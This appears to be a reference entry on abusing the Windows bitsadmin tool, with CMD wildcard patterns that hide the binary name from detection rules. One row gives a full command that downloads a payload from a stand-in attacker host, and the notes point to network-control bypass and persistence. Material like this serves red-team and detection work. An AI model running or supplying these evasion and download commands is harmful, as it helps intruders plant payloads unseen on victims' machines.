bitsadmin
Background Intelligent Transfer Service admin tool. Can download or upload files using BITS jobs, bypassing some network controls.
Binary Paths
C:\Windows\System32\bitsadmin.exe
Glob Patterns
| Pattern | Wildcards | Notes |
|---|---|---|
for /f %i in ('where bits*.exe') do %i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
|
* | Star matches 'admin' after 'bits' |
for /f %i in ('where b*admin.exe') do %i
|
* | Star replaces 'its' |
for /f %i in ('where bitsad?in.exe') do %i
|
? | Single char wildcard replaces 'm' |
for /f %i in ('dir /b C:\Windows\System32\bits*.exe') do %i
|
* | dir /b with glob pattern |
Platform Notes
CMD glob evasion requires the for /f + where pattern. BITS jobs persist across reboots by default, making bitsadmin useful for persistence too.